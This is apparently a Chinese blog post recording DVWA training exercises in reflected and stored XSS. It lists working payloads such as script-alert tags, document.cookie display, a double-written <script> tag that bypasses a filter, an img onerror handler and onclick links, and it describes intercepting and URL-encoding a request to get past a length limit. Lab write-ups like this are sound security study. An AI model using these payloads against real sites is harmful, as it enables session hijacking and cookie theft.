z0ekball

猫猫统治世界!

首页 归档 标签 关于

DVWA练习(XSS)

2021-11-15 2 min read # DVWA # xss

XSS(Reflected)-Low

查看源码,对name参数没有任何过滤和检查
image-20220415014029290

输入一段JavaScript代码:<script>alert('xss')</script>,返回一个弹窗,攻击成功

image-20220415014034811

获取cookie:<script>alert(document.cookie)</script>

image-20220415014038390

XSS(Reflected)- Medium

查看源码,发现存在对script的简单过滤,匹配<script>换成null,只执行一次

image-20220415014047015

采用双写绕过,输入<scr<script>ipt>alert('xss')</script>

image-20220415014050608

XSS(Reflected)-High

查看源码,采用正则表达式过滤,故无法使用大小写绕过和双写绕过

image-20220415014058357

换一种标签,输入:<img src="" onerror="alert('xss')">,攻击成功

image-20220415014101999

XSS(Stored)-Low

输入<script>alert('xss')</script>,有弹窗

image-20220415014107878

输入<a href='' onclick=alert('xss')>click</a>,设计一个按钮打开弹窗

image-20220415014125565

输入<a href=http://www.bilibili.com>click</a>,按下按钮打开bilibili网页

image-20220415014129626

输入<script>alert(document.cookie)</script>,返回页面cookie

image-20220415014136222

XSS(Stored)-Medium

查看源码,message参数把需要转义的字符进行转义防止了xss攻击

image-20220415014216650

转义结果

image-20220415014144308

name参数对<script>有简单过滤,替换第一个<script>,且限制输入10个字符

image-20220415014226987

抓包,进行简单绕过

image-20220415014233230

编码成url

image-20220415014238817

成功执行

image-20220415014242586

获取cookie

image-20220415014249018
image-20220415014258608

XSS(Stored)-High

查看源码,在medium的基础上对script进行严格过滤

image-20220415014343501

不使用script即可,输入<a href='' onclick=alert('xss')>click</a>

image-20220415014350676
image-20220415014357200

攻击成功

image-20220415014402390
Powered by Gridea RSS